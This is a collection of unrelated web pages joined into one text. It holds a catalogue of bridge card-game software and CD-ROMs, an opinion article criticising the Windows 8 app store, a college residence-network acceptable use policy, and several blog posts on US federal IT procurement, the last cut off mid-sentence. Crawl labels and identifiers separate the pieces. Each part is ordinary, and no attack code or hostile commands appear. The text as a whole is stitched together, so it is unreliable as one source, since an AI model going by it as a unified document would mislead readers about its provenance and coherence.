Various game options allow you to play Rubber Bridge, Chicago Scoring or Duplicate.
Choose from 12 bidding systems and play four or five card majors. __________________________
"Bicycle Bridge" 1999 Expert Software, Inc. CD-ROM version is an exciting way to advance your skills in this fascinating, classic bid and play game. Features include: -
Increasing levels of difficulty---a constant challenge for beginners and seasoned players alike
Advance your skills using on-screen tutorials, feedback, replay and hint features
The easiest menu-based interface of any card game software!
Dynamic animated card-playing charachers to play with --- or against
Enjoy live card game action and simultaneous chat via network, modem, internet, or play for free on the Microsoft MSN Gaming Zone. __________________________
3D Bridge Deluxe, powered by our award-winning 3D Card games software engine, allows you to turn the tables on more experienced bridge players. With this program, beginners and seasoned players alike can learn the ins and outs of the game prior to taking the challenge to their weekly Bridge party as well as any opponent in the world via online play. Features include: - Many Bidding Styles: Weak 2 Bid, Weak Jump Overcalls, Takeout Doubles, Cuebids for Slam Bidding, Blackwood Convention, Gerber Convention, Stayman Convention and Jacoby Transfers.
Voice recognition.
Interchangeable, 3-D animated, talking opponents. __________________________
This must be one of the finest computer bridge games ever created. Take part in the world renowned "Bridge Olympiad" tournament, right in the comforts of your own home! Bridge masters are calling this bridge game software the most challenging ever! The computer will test bridge masters' abilities while being the mentor for novice players! Practice slams, defensive play, and how to play no trump hands. Choose the type of partner you want to play with. Each partner has different bridge techniques and syles! Features include: - Complete player history, The largest mumber of bidding conventions on the market
Tournament play A myriad of computer players, each with a different playing style and personality A great way to practice before an upcoming tournament. Full documentation on the CD
Artworx Bridge is the longest continuously published bridge game for computers. It was originally coded in 1977 and is now it is in its 8th version. Artworx Bridge 8.0 is a complete bridge playing program in which you and your computer partner bid against two computer opponents and then play out the hand. It it the perfect bridge game for Novices: Bridge 8.0 includes an on-line bridge tutorial covering all aspects of the game. A hand editor allows you to create specific hands to practice your bidding and play. Not only does Bridge 8.0 deal millions of randomly generated hands, it also has an extensive hint mode that covers all bidding situations. Don't know what to bid? Ask Bridge 8.0- it will tell you and give you the reason! Features include: - Play contract or duplicate bridge. Bidding is Standard American five-card majors with Stayman, Blackwood and Gerber conventions. Choose weak or strong 2-bids. Modify your partner's and opponents' bidding styles.
GOTO Bridge is an educational software package is backed by one of France's emerging stars, Jérôme Rombaut. It is designed as an educational program, and offers a wide range of features that are sure to be of use to any aspiring player. Once you have completed the simple installation you are invited to play 20 deals so that your skill level can be analysed. You are able to compare your results against those achieved by other players under tournament conditions. (The Editor is prepared to reveal that they are testing - and that with a degree of luck he managed to score 68%, putting him at the top of the ranking list.) There are a host of features that enable you to practise specific areas in both bidding and play and you can also test yourself against the best by trying the deals from the 2009 World Championships. The graphics are outstanding and there is a detailed booklet explaining how to make the most of the various features.' - Mark Horton, BRIDGE magazine.
play the deals of the 2009 World Championship in Sao Paulo
More than 10 000 deals with comparison
Lessons and exercises: to excel in the card game
Commented deals: you play then you consult the commentary
Practice: quizzes, rubber deals, pre-scored tournaments, bidding sequences, etc.
Eddie Kantar is one of the world's most famous players, and Eddie Kantar's Bridge Companion is one of the few bridge games that focus on teaching the basic rule. The game incorporates three popular bidding systems, Goren, 4-card majors, and 5-card majors. The highlight of the game is the many excellent card-playing tutorials that teach you the basics as you play the game. Ed Kantar doesn't offer any lessons on advanced bidding. If you are new to the game, Ed Kantar is a good game to start with. Intermediate and advanced players should look for something more challenging.
"Interactive Bridge" by ValuSoft brings exciting Bridge action to your desktop, with the software having all of the features of the real game. Play with the computer or with a friend. Includes 13 bidding conventions, and an interactive tutorial!
Micro Bridge is adjustable to any of the ten skill levels. There are many conventions and gadgets available so you can design your own system. You can select random deals or choose from a tremendous variety of deal types which is very handy for biddding practice. Bridge Bidding Conventions and other Practice CDs Volume 1: Stayman
Jacoby Transfers
Weak Two-Bids
Michaels Cue-Bids
Jacoby 2NT
Negative Doubles
Beginning bridge players will appreciate the friendly and clear teaching style of the "Learn and Practice Bidding Conventions vol 1, vol 2 & vol 3 " CD-ROMs. All bridge players will love the opportunity to practice conventions and continuations in detail. Practice conventional bids, responses, and rebids on thousands of deals with feedback tailored to reinforce conventional understandings and correct bidding mistakes. Either learn a convention from scratch or practice using a convention you already know. You can learn and practice many bidding conventions with detailed explanations and interactive quizzes.
Volume 2: Stayman
Weak 2's
Takeout Doubles
Preempts
Strong 2 Club Openers. Volume 3: Unusual 2NT
Splinters
Limit Major Raises
Forcing 1NT
Negative Doubles These two CD-ROMs each cover three books from the 'Practice Your Bidding' series of books by Barbara Seagram. "Practice Your Notrump Bidding (CD-ROM)" covers Stayman Auctions, Jacoby Transfers and Four Suit Transfers. "Practice Your Slam Bidding (CD-ROM)" covers Jacoby 2NT, Splinter Bids and Roman Keycard Blackwood.
"Marty SEZ... Bergen's Bevy of Bridge Secrets" is the interactive CD-ROM of Marty Bergen's book with software by Fred Gitelman. Marty Bergen is a 10-time North American Champion and one of the leading bridge writers and teachers in the world today.
Points Smoints .
Marty Bergen .
An interactive software product based on the best-selling book "Points Smoints" by Marty Bergen. This CD-ROM has plenty of example hands and quizzes and a wealth of useful advice that will have a major impact on your results at the bridge table." Modern BridgeDefense Eddie Kantar This interactive edition of Eddie Kantar's book is an educational and fun software product that presents the same material in interactive mode (including opening leads, signaling, second and third hand play and discarding), giving you a chance to try the questions, practice hands and tests. The animated diagrams make following the play a snap. Advanced Bridge
Defense Eddie Kantar This interactive CD-ROM presents the same material as the book in interactive mode. Advanced defensive play has never been explained more clearly.
Topics such as defensive strategy, inferences, counting techniques, how to develop extra trump tricks, false carding and lead directing doubles are explained so thoroughly that even experts will benefit from studying them. Topics inDeclarer Play Eddie Kantar This interactive edition is an educational and fun software product that presents the same material as the book in interactive mode, including entry mangagment, long suit establishment, finessing, the dreaded counting and how to plan a strip and end play. Test yourself with the numerous quizzes that follow. Countdown to
Winning Bridge Tim Bourke "Countdown to Winning bridge CD-ROM by Tim Bourke and Marc Smith is based on the authors' book of the same title. This interactive software program teaches the essential skills involved in counting bridge hands.
"Discover Bridge, Play with Eddie Kantar" an exciting new (2010) CD-ROM from one of the world's foremost bridge teachers.
Learn to play Bridge CD-ROM
Pat Harrington teaches you how to play bridge. You will learn to play bridge from scratch. No prior knowledge is required. This disk takes the best material written by one of the world's best teachers and computerizes it using the interactive and easy-to-use Bridge Baron Teacher interface, so that you can learn on your own time, with no pressure, in the privacy of your home, and at your own pace. Makes a great companion for students taking a bridge course with an bridge teacher, but is also detailed enough to stand alone. Features of "Introduction to Bridge (lessons 1-6)" include: Teaches both bidding and play
Paced appropriately for beginners
Lessons 1-3 teach the mechanics, trick taking, and provide the background for bidding
Lessons 4-6 teach opening bids and their responses
Quizzes to reinforce your understanding
Provides an extensive glossary and reference section
Includes 38 carefully crafted instructional deals, and 92 BONUS practice hands
Presented in an easy-to-use, interactive format. Disc 2 Introduction to Bridge (7-13) Play and Learn with Pat Harrington is the next in the series:
Lesson 7: Dummy Points Lesson 8: No Trump responses and rebids Lesson 9: No Trump bids by opener Lesson 10: The take-out double Lesson 11: Pre-empts Lesson 12: The strong 2 club opening Lesson 13: Stayman "Bridge Coach � SAYC" is designed for players looking to practice their Standard American Yellow Card bidding and improve their bridge game in a safe environment that allows you to proceed at your own pace. The disk contains 250 complete deals; the earlier deals are simpler hands where you learn basic concepts and maximum guideance is provided while playing the deals. As you advance further into the program you will encounter more sophisticated bidding and also be given more freedom in the play of the hand. ____________________________________________________________________
Learn Bridge CD is the first complete interactive teaching program on CD. It uses video and animation to present 40 interactive lessons on basics, bidding, defense and play. It contains material from the world's best bridge teachers in easy-to-use interactive lessons. Lessons 1-6 start with the absolute basics, introducing trick taking, trump suits, and bidding; then going onto the play of the hand and bidding. There is an unlimited number of quizzes, so you can practice as much as you like. It is based on Standard American bidding, with 5-card majors and 15-17 no trump openings. Learn Bridge teaches Stayman, Blackwood, Strong 2 Club Opening, and Weak Two Bids. It is recommended for absolute beginners to intermediates. Easy to install and operate.
Hand Held Bridge Playing Computers
Now you can play bridge anywhere to stay card-sharp or learn how to play with Excalibur's LCD Bridge. Excalibur Resseach Labs teamed up with international champions and officials to bring you the latest in Bridge technology. This new handheld uses 500 hands carefully researched and compiled by a panel of Life Masters and Grandmasters. Each hand is accompanied by a short commentary that explains strategies, vocabulary and other winning tips. Choose from two levels of difficulty, novice and intermediate. Uses contract bridge scoring and official SAYC bidding. Expert hints for bidding and playing Complete bidding of hand any time Auto replay Computer scoring to assess your skill __________________________
The Pro Bridge 311 is the world's strongest hand-held bridge computer and has extensive featureswith different screen selections allows all the cards to be viewed simultaneously. Users can select from the following bidding conventions; American Standard, ACOL, French Standard, and the French Strong Two. Pro Bridge plays and keeps the score in either Rubber Bridge, or Duplicate Bridge. There is a choice of random shuffle (which simulates a normal deck of cards being shuffled), manually choosing the cards you would like dealt, or choose from nearly 1 million hands in the computers permanent deal library. The computer can suggest hints if you like, and has a take back function if you want to try rebidding a hand, or replaying different cards. Features of the Pro Bridge 311 include: Pocket-sized (4.5" x 8") bridge computer allows you to play anywhere, anytime. Strong program that plays the following bidding systems: American Standard, ACOL, the French Standard, and the French Strong Two. Large (2.5" x 3") easy-to-read LCD screen Ideal for players of all skill levels. 11 Levels of Play - 9 Levels of Rubber Bridge, 1 Duplicate Bridge Level, and 1 Computer Peeks Level.
Automatically shuffles and deals, scores, and follows suit. Hint key will give suggestions.
No cards to lose Sound effects (can be disabled) Includes instructions for the following languages; English Requires 4 AAA Batteries ____________________________________________________________________
"Bridge and Backgammon" is a combined CD-ROM with both games. The bridge can be played against the computer or you can hook up to the internet to play online. The computer bidding standard is really good and you can select which bidding conventions and preferences you want. Also, if you don't know why a bid was made, you can click on that bid and the computer will interpret it for you. You can select to play open hands or choose the cards for each hand so you can set up certain hands and study them. It's great! The backgammon is fun too,
for the beginner who wants to become good at backgammon, this software is highly enough. With serious, persistant effort one can become a fine player in record time using this CD. It trains your mind without your even seeing it work.
Search over 800 bridge books on this site.
Search for other items at Amazon.com
Search for other items at Amazon.co.uk
Enter author, title or descriptive words.
go to the Bridge shop or UK bridge CD-ROMs or Bridge book authors or Bridge book review index or page:
B1, B2, B3, B4, B5, B6, B7, B8, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 89, 98, 99.
Visit Bridge Books website for a list of bridge books categorised by content and level. | 计算机 |
2015-48/3678/en_head.json.gz/16150 | Posted 5 reasons why the Windows 8 Store is a complete mess By
The Windows 8 app store is perhaps the most controversial feature in Microsoft’s new operating system. Windows has thrived for decades because of its openness to developers and willingness to let them take both the spotlight and the profits. Some developers – like Marcus Persson, the creator of Minecraft – have denounced Microsoft’s store as a blatant attempt to make Windows a closed platform. Microsoft may turn out to be the greatest ally of its critics. Though the Windows 8 store exists, the company doesn’t seem to care about its quality. Redmond has released a sloppy, inefficient, obtuse store that’s arguably the worst store baked into any modern OS. In short, it’s a disaster.
The store is full of shovelware
Windows 8 is not Microsoft’s first attempt at a store. The company already created two for Xbox Live. One, Xbox Live Arcade, is a pleasant curated experience filled with games that range from playable to amazing. The other, Xbox Live Indie Games, is an anything-goes mess.
Microsoft has used the latter to model the Windows 8 store. While there are some decent apps, many are shovelware. They either don’t work as advertised or work poorly. And some stand on questionable legal grounds.
The first two paid apps shown in the Entertainment section, for example, are fake versions of Windows Media Player. Both use logos that probably wouldn’t pass muster in a copyright case. We’d imagine that Microsoft itself would want these apps shut down for infringement – instead, they’re the number one and number two results on its own app store.
Similar problems can be found elsewhere. Two of the top 10 apps in the Photos section are nothing more than photo collections featuring attractive women (sold without the photographer’s or model’s permission, we’re sure). News & Weather is dominated by useless apps that provide far less information than websites on the same topic. And the Social category is populated by unofficial apps for every major social network – including Facebook, Pinterest, and Adult Friend Finder.
While the App Store has taken flak for its closed approach, Apple should also be given credit. When Apple opened its virtual doors it took responsibility for the store’s quality. Microsoft, however, seems to view the Windows Store as a source of passive revenue. Details like quality control have been brushed aside. Plenty of ports, but few original games
Apps in Windows 8 should ideally be designed for the operating system – and many are. Yet some categories, particularly games, are dominated by ports. Nine of the top 10 games in the paid games section are ports from iOS or Android. The outlier is a port from the Xbox 360.
Ports can be great when refined to take advantage of a new platform, but most games on the Windows 8 store don’t bother. Instead, most are scaled down versions of existing smartphone apps. That means pixelated graphics, comically over-sized buttons, and simplistic touch controls that don’t work well with a two-pound tablet. Strangely, apps for the iPad – which would be a better fit – haven’t come to Windows 8 in great numbers.
Some developers are using Windows 8 to cash in on their existing clout, and shame on them. But Microsoft also deserves blame. After talking up gaming in Windows 8, the company has done nothing to promote, police, or curate the games available. Top Xbox titles are absent such as Mark of the Ninja, The Walking Dead, and Fez. Search is busted
The proliferation of shovelware in the store’s “Top Paid” and “Top Free” lists might force users to abandon them in favor of search. Just one problem – search is terrible.
Some specific searches are handled well enough. For example, typing “Netflix” gives us the Netflix app; looking for “antivirus” calls up 34 options, and most of them are from reputable developers. But other common searches return baffling results: a Blackjack app is the top result for “strategy games”; the first result for “keyboard” is a virtual piano; and only half of the top 10 results for “organization” have anything to do with the topic. Microsoft’s anything-goes attitude compounds the problem. The top social apps on the Windows 8 store may be ripoffs, but they’re nothing compared to what we found when we searched for “Facebook.” A half-hearted album uploader? Why not! Two “Facebook Lite” apps from different developers? Sounds good! An app with copyright-infringing images cropped to create Timeline covers? Awesome!
Even if the content was fixed, the functionality of search would be limited. Users can refine only by category and price category (free, free and trial, or paid). Results can then be filtered by relevance, newest, rating, or highest/lowest price – and that’s it. There are no sub-categories and no fine-grain filters. Promotions are rare (and boring)
Successful online stores strongly promote the products found inside, creating a perception of value and excitement. Some promotions can even be useful. Steam, for example, has a new deal almost every day as well as a prominent featured product section that rotates automatically or can be browsed at will, which makes hot games easier to find.
Microsoft has ignored this principle and offers nearly no promotion in the Windows 8 store. The “spotlight” area lists only three apps, all of which are free, and two app sub-sections, both of which are filled with just a handful of options.
Only one of these two sub-sections is advertised as a sale, and all the apps in that section are free. Are they normally not free? Who knows! Microsoft doesn’t bother to say. Blunders like this are made worse by the lack of new content. Spotlight promotions are rotated infrequently, and category-specific promotions suffer the same problem. There’s also not enough promoted content. Both the App Store and Google Play have numerous best-of and must-have lists, which help customers find great apps and become excited about the platform. Microsoft’s only recurring efforts are the “top paid” sections which, as already discussed, are full of shovelware. Strong product promotion would help Microsoft push subpar apps out of the spotlight, spark consumer interest, and make the store easier to navigate. Without it, the store has turned into a free-for-all that encourages developers to push out terrible apps with clever or deceptive names.
The user interface is awful
We’ve noticed that our interaction with the Windows Store is dominated by swipe-to-scroll. Browsing the entire storefront on the Acer Iconia W700, for example, usually requires three or four big, sweeping swipes. That’s unusual. The front page of the App Store requires only one swipe when viewed on the iPhone 5 and the same is true of Google Play on the Nexus 7.
Loading the Windows 8 store always brings users to the Spotlight section (shown above, center). This, as mentioned, only lists a handful of featured apps and categories. Most devices will also display a “manufacturer’s picks” section – and that’s it. Nothing else is visible.
The App Store on the iPhone 5 (shown above to the left of the Windows Store) manages to do far more with its relatively tiny 4-inch-wide display. The Featured section includes a rotating banner, a scrollable “New and Noteworthy” section, and links to two separate areas containing apps that Apple thinks will be ideal for new users. There’s also a navigation bar at the bottom of the store.
Google Play on the Nexus 7 (shown above to the right of the Windows Store) does even more. Every category in the store is presented immediately. There’s no need to scroll at all, and Google still finds room for three featured promotions.
The Windows 8 store is designed as if it’s a retail store with only one aisle. Oh, you’re looking for men’s clothing? That’ll be 300 yards straight ahead, on the left, past the frozen foods.
The lights are on, but nobody is home
When we say that the Windows 8 store is a disaster, we mean it. Things could only be worse if the servers that run it caught fire, though even that would give Microsoft a chance to start over. The store fails by almost every measure a store should be judged, including selection, quality, and organization.
We had reached out to Microsoft to give the company a chance to comment on why the store has been allowed to go live in such a sorry state. The reply we received was a pre-baked PR line: “Microsoft is proud of the quality apps that are currently available in the Windows Store and look forward to adding more innovative apps from the Windows developer community who continue to submit new apps every day.”
Microsoft is proud of this? Really? The current incarnation of the store sells apps with deceptive names, apps that infringe on copyright (including those owned by Microsoft), and apps that are straight ports from mobile platforms. There’s nothing to be proud of. This is why the company is difficult to take seriously despite its healthy profit and strong position in the PC market. How does such a spectacularly terrible service manage to slip into the world’s most popular operating system? Was no one paying attention? Did no one care? We don’t know the answers to those questions, but we do know that Microsoft needs to find them. The future of the company depends on it. Get our Top Stories delivered to your inbox: | 计算机 |
2015-48/3679/en_head.json.gz/165 | I AM A ... Prospective Student
E-MAIL PRINT ResNet Acceptable Use PolicyThe purpose of this Policy is to ensure an available, reliable, secure, and responsive computing environment for all Residential Network (ResNet) users.
Users' responsibilities:
ResNet Users are responsible for all use of their network connection, whether such use is by the subscribing user or others allowed to use the connection by the user.
Users must have a computer system that meets the minimum requirements of the ResNet Program as outlined on the ResNet Web Page.
Users must abide by state and federal laws and by the College of St. Scholastica Computer and Network Policy and Password Policies and any other applicable policies that are developed and distributed. Such policies are available at the Information Technologies Web Page.
Key points from these policies include:
If any use adversely impacts the network, the user will be asked to schedule his or her work outside of regularly scheduled hours (8 a.m. - 5 p.m. Monday - Friday) or to confer with the Information Technologies Department to reconfigure his or her work so that network impact is avoided.
Acceptable use always is ethical, reflects academic honesty, and shows restraint in the consumption of shared resources. It demonstrates respect for intellectual property, ownership of data, system security mechanisms, and an individual's right to privacy and to freedom from intimidation, harassment, and unwarranted annoyance.
Do not aid or allow any unauthorized person to use College computer or network equipment and do not provide access or use of your account to any other individual or group.
Do not break into accounts or bypass security measures in any way.
Only the computer belonging to current CSS students residing in the resident halls may be attached, directly or indirectly, to the network connection provided. Attaching another computer, configuring your computer to act as a server, or using any other type of connection is not permitted. You may not extend or re-transmit network services in any way and you may not provide Internet access to other users by using your networked computer as a bridge or gateway.
ResNet staff may require access to a user's computer to maintain the network hardware and software. Upon 24-hours notice, users agree to provide reasonable access to their machines and to the necessary modifications required to provide network communications (e.g., installation of TCP/IP applications).
Users agree to abide by the license agreements governing the use and distribution of the software installed on their machines.
Information Technologies Support Responsibilities
ResNet staff may need to disable hardware or software that is incompatible with the network resources. We cannot guarantee functionality if hardware and software is added at a later date. ResNet staff may have to return the computer to its original configuration in order to test and troubleshoot network connectivity problems.
Key points to ResNet and User responsibilities are as follows:
CSS students residing in the residence halls, may install other software packages and Internet applications on their own computer's hard disk as long as they do not violate any of the previously referenced policies. Users must install and support these other applications themselves.
CSS students residing in the residence halls, may install peripheral devices on their personal computer (e.g., sound cards, video cards, joy sticks) as long as they do not violate any of the previously referenced policies. Users must install and support these other devices themselves.
For assistance with troubleshooting ResNet installation or problems, contact the Computer Support Help Desk, ext. 5911.
The College's network is designed to be used for College purposes. The College cannot guarantee the security and integrity of any information placed on the network, including personal data, programs placed on the network, or individual workstations. We recommend that all significant data be backed up on a regular basis.
The network is owned by the College and the College maintains the right to provide further regulation, as it deems appropriate, to limit use or access, and to monitor the systems used for security purposes. Users, by their use of the network, accept the College's rights in this regard. The College does not intend, as a matter of Policy, to monitor the use of technology (including e-mail) and will respect individual privacy to the extent feasible. However, the College expects users to be responsible in their use of the network. Faculty, staff, employees, students, and agents of the College agree to refrain from any private communication which suggests that there is College approval of such communication. Further, the Information Technologies group may, if deems it necessary or appropriate, conduct monitoring of resources in order to ensure reasonable maintenance of system hardware, software, data, network traffic, or security. If such monitoring involves the reading of file information, e-mail, or documents, or accessing the user's computer, the owner of the resources will be provided prior notice, whenever possible.
In the event that this Policy is questioned, the Chief Information Officer of Information Technologies, and the Information Technologies Resources Committee are authorized to provide interpretation of this Policy.
If a user performs a function that adversely impacts others on the network, he or she will be required to terminate that work immediately. Any further violation of this Policy may lead to the loss of network privileges as approved by the appropriate Dean or Vice President. Offenders may be subject to College disciplinary procedures as well as criminal or civil prosecution. Any appeals should follow appropriate College grievance procedures.
Modifications to this Policy
The Policy and Procedures Committee at the College reserves the right to modify this Policy at any time. Users of the system will receive prompt notification of all modifications.
Updated: April 12, 2006by Lynne Hamre | 计算机 |
2015-48/3679/en_head.json.gz/376 | MeriTalk - Where America Talks Government
Invite Friends | Forgot Password | Register
Mobile Work
Why the IT Procurement Debacle Did Not Need to Happen
[ Comment ]
0 trackback(s)
[ Trackback ]
Tags: e-Procurement
When the President of the United States calls out the Federal IT acquisition process, we know we have a problem. Acquisition seldom gets any ink at all unless something goes wrong, but it is particularly notable when the IT-User-In-Chief spends time on it. How did the Federal IT community find itself in a situation where procurement rules contributed to, but certainly weren’t mainly responsible for, the failure of a major national IT initiative?First and foremost, it is imperative to understand that this did not need to happen. Commercial item acquisition rules were streamlined less than 20 years ago and, along with them, specific changes were made that were designed to make IT acquisition faster, more competitive, and deliver great value for every dollar spent. Commercial item acquisitions were, for a time, exempt from a host of government-only buying rules. Federal IT users did get “today’s technology today.” The technology gap that existed in the late 80’s and early 90’s was significantly narrowed, if not closed all together.So, what happened? Perhaps the most significant impact on the commercial IT acquisition rules of today comes from changes made because of contracting problems related to the wars in Iraq and Afghanistan. While these problems were not, of course, specifically related to commercial acquisitions, those acquisitions were covered by new rules anyway. Any seasoned Congressional staff member will tell you that this is what happens when Congress applies its “meat axe” approach to a problem requiring a more narrow solution. Federal IT acquisition rules became collateral damage in the process of trying to clean up war-time contracting.New rules mandating transparency of executive pay, how costs are allocated, the need to make mandatory disclosures of suspected problems, and the ability of any interested party to see your company’s tax, environmental, labor and other compliance issues all created significant burdens for IT contractors. Add to this significantly increased IG oversight, and a Federal IT market is created where only specialized firms with enough resources to dedicate to these government-only requirements can participate. Let’s stipulate here that no one is in favor of fraud, waste, and abuse. Companies and the government officials they work with should be honest. We all want government money to be spent wisely, right?If you just answered “yes” to this question, though, you have to agree that it is not being spent wisely now. Round-the-clock fixes to Healthcare.gov don’t come for free. Neither do compliance systems for government-only requirements. Another cost is the loss to the government of the commercial expertise of IT firms that won’t even enter the market because of current hurdles. The government pays a price for the current regulatory burden, whether directly or indirectly.It is past time to strip away non-essential rules meant for weapons systems procurements or government-only solutions, but that are now applied to commercial firms as well. In addition to this, contractors need to stop being uniformly viewed with suspicion. There is a lot that industry and government can do together to return Federal IT procurement to the state of moving “at the speed of need”. Applying common sense to determine what a positive Federal IT acquisition outcome would look like is a good place to start.Larry Allen is a MeriTalk contributor and President of Allen Federal Business Partners. To share your thoughts on Federal IT aquisition, please leave a comment below.
IT Commoditization? Are we bringing back Murphy Brown?
Tags: Enterprise Applications
It was the year in which Bryan Adams sang “Everything I Do, I Do it For You.” The first George Bush was President and the Giants beat the Bills in the Super Bowl. Yes, 1991 was chocked full of history. No, this isn’t a trip down memory lane, but a reminder that if you stick around in Federal IT long enough, acquisition trends have a way at coming back to haunt you. So it is with IT commoditization and other “new” trends that sound familiar to those of us with long memories. 1991 marked one of the last years that the Federal government purchased IT mostly as a product. The iconic Desktop IV contract, and its contemporaries, was primarily a product-based deal designed to drive prices as low as possible with limited competition. Contractors fought tooth and nail for these contracts. Implementation was delayed by successive rounds of protests as the stake was high. This may sound familiar to companies involved in recent discussions surrounding reverse auctions, or even plans by GSA to expand its Strategic Sourcing program to include “commodity IT” products. Also, recent reports show that more and more agencies are using modular contracting to obtain IT solutions come to mind. Low price is again king in the Federal market and there is more than a passing glance at de-coupling IT product purchases from network services.Before everyone gets carried away, though, let’s remember that there are good reasons why there was no Desktop V contract. First, the government realized that approaches like the Desktop program were a great way to get yesterday’s technology at a premium price. By the time protests were resolved, the technology had changed. Buyers either had to use outmoded technology or pay a comparatively higher price for current market products. Ironically, lower prices and greater levels of competition were often available on GSA Schedule contracts within 24 hours after an initial Desktop award was made. Second, the government realized that they had some serious compatibility problems. While the modular, product-based approach may have served the needs of Wednesday’s buyer, there was no guarantee that it would work with what someone next door bought on Thursday.Lastly, the government realized that it wanted the services of an IT system, more than it wanted to own and manage the system itself. Providing a functional system became the job of contractors, while agencies were allowed to focus more on fulfilling their core missions. While IT solution purchases have not been without their own issues, the government now benefits from having much better compatibility across IT platforms and has ready-made contract vehicles that assure agencies get today’s technology today. Continuous improvement is certainly called for, but does anyone really think that government IT systems would function at all if it had stayed with a modular, product-based acquisition model? We’d have a cloud all right, but it would be a cloud of confusion. All of this is worth remembering before IT executives in industry and government “Join the Joyride” toward acquisition practices that were used over 20 years ago and found lacking. Commoditization brings a strong lure of low prices, but there is no free lunch – only higher prices to pay for incompatibility and non-transparency. These are relics that need to be remembered as well, but as a reminder that we don’t want to relive this part of our past.
Contractors Should Cast a Wary Eye on Case/Leonsis Investment in FedBid
The recent announcement in The Washington Post that Revolution Growth, the equity firm owned by Steve Case and Ted Leonsis, made a significant investment in online reverse auction tool FedBid should be met with a wary eye by government contractors. The move signals that FedBid will get a nice infusion of cash, and some well-connected investors who have publicly stated that they want the company to become an online marketplace for billions of dollars in government procurement. The timing of the acquisition coincides with a drive already underway in many Federal agencies to use low price, technically acceptable procurement standards as the sole standard for conducting all of their procurements.Many contractors have long been uneasy with FedBid as the company aggressively marketed its reverse auction tool to Federal agencies for all sorts of procurement actions. It is not so much a concern with the company’s sole emphasis on low price, as it is that the firm encourages the use of reverse auctions in situations that aren’t suitable for its use. Additionally, FedBid fees have in the past been less than transparent, making it difficult for a winning contractor to know what its own net price was.While reverse auctions can be well-suited to commodity purchases and other simplified acquisitions, the format does not lend itself well to the acquisition of professional services or to projects such as enterprise-wide IT solutions. When reverse auctions were first used in government in the early 1990’s, both buyers and sellers sometimes realized after the fact that they had either awarded or won a procurement that was not executable because the reverse auction format had not allowed for consideration of multiple variables. The result was either a re-procurement or a significant and costly adjustment to the original award price.FedBid is already big business. Last year the company assisted with 20,000 procurement actions valued at more than $1.4 billion. Agencies using FedBid can conduct open market procurements, or use existing IDIQ contracts like GSA Schedules or Alliant. As such, an agency decision to use existing contracts does not preclude them from using FedBid as well. Ted Leonsis will become FedBid’s new Chairman. Among those serving on the board will be retired Army Chief of Staff George Casey. It seems clear that FedBid will have easy access to the top echelons of government and be able sing the siren song of lower costs into the ears of those who may not understand that no customer, even the Federal government, should always purchase based on cost alone. Any advocate for common sense acquisition – contractor or government buyer – needs to be prepared to show that reverse auctions have their place, but are only one option that the government should examine. The commercial sector uses this mechanism for certain purchases, but not all. The reasons why this is so should be made clear. Similarly, not every procurement action should be solely evaluated on price alone.The message from common sense acquisition advocates needs to be clear, concise, and frequently heard. You can be sure that the message from Revolution will be.
Where Your Cloud is Should Matter: Why New Rules May Be Needed to Maintain Common Sense for IT
Cloud computing allows for incredible innovation and flexible solutions. It has become the major driving force in Federal IT for many reasons, among them a current Office of Management and Budget mandate for each Federal agency to identify at least three IT functions for movement to a cloud format this year.Unfortunately, Federal regulations don’t always keep pace with innovation. This fact is usually cited in cases where a Federal rule prohibits use of some new method of doing business. It can be frustrating for Feds and contractors alike to have government-unique stumbling blocks that lead to extra costs and delays. Outdated rules can also work the other way when agencies try to rely upon them to ensure common sense.The General Services Administration (GSA) recently tried to limit the geographic locations of where cloud servers could be located. To many, it seemed like the agency set sensible limits to ensure that cloud servers weren’t going to be located in war zones, countries known to have strong terrorist organizations, or other unstable places. We know by now that GSA’s attempt to limit cloud server locations, however, ran afoul of a protest. The Government Accountability Office ruled that the agency could not limit cloud server locations, pointing out that the Trade Agreements Act (TAA) states that, when buying services, it is the location of the company offering the service that matters, not where the service itself may be performed. As a result of this ruling, agencies that want to restrict cloud server locations to more stable places will have to rely on other laws or rationalizations. This will require creativity and, of course, delay in the implementation of what most agree would be a money-saving, state-of-the-market solution. It’s time to see if we have the rules we need to enable us to make common sense decisions and, if not, we need to start on that process today.One law that definitely needs updating is the TAA itself. Remember Jimmy Carter, double digit inflation, and The Knacks, “My Sharona”? The year was 1979 and, among many laws adopted that year was the TAA. GM was the largest company in the U.S. in what was still a product-based economy.No one had a clue that the “Information Age” would soon dawn or that the world would shift to a service-based economy in less than 20 years. The TAA gave short shrift to services, and keenly focused on the location of product manufacturing. The U.S. economy and world trade itself have changed fundamentally since 1979, but the TAA has not. This has forced Federal contractors, and the government itself, to come up with serpentine reasoning to accommodate the Feds’ acquisition of commercial IT. The problems are well-documented and we need not review them here. Now, agencies and contractors may find that they have to create an entirely new set of serpentine interpretations just to make common sense service acquisitions.Wouldn’t it be simpler to just update the rules and regulations? Maybe we could do it faster if they were in the cloud? SBA Needs to Provide “Care After the Contract” to Ensure Small Business Success
The Small Business Administration (SBA) routinely points out the shortcomings of Federal agencies when they fail to follow statutes or regulations governing the use of small businesses in procurement. They also aren’t shy about holding the feet of large businesses to the small business use fire. All of that is fair, and a part of their mission. But, before the agency gets too far ahead of itself, a little introspection on how it’s supporting small business Federal contractors might reveal problems closer to home that need attention.The SBA has a very difficult mission. It is a relatively small agency tasked with fulfilling many different roles. Most people outside of contracting look at the SBA mainly as a place to obtain loans or other financing. The SBA is often mentioned, right after agencies like FEMA, as being critical to the restoration of local economies when disaster strikes. Their missions are often politically charged and at times, it may feel to the agency that they have 535 administrators.Sticking to the basics, though not politically glamorous, is nevertheless essential if real small firms are to be helped. It’s great to get small businesses 8(a) certified, but it is equally important to support such firms when they run into problems with other Federal agencies. Support for small business success doesn’t end with the award of a certification or contract. The SBA needs to be a true “lifecycle partner” with agencies when post-award problems develop. If an 8(a) contractor has a valid claim against another Federal agency, the SBA must use its statutory authority, along with its considerable powers of persuasion, to assist that firm. The goal, after all, of the 8(a) program is to create successful businesses. While this doesn’t mean that all 8(a)s are entitled to become successful Federal contractors, it does mean that the SBA achieves better outcomes by ensuring that 8(a) companies thrive in whatever market they do business. Helping existing businesses is a bit like working with current customers: it is generally easier to keep existing relationships successful than to constantly start new ones from scratch. The House Small Business Committee recently held a number of hearings on the state of small businesses in government contracting. These hearings included the status of mentor-protégé contracts, the challenges facing the Office of Small and Disadvantaged Business Utilization 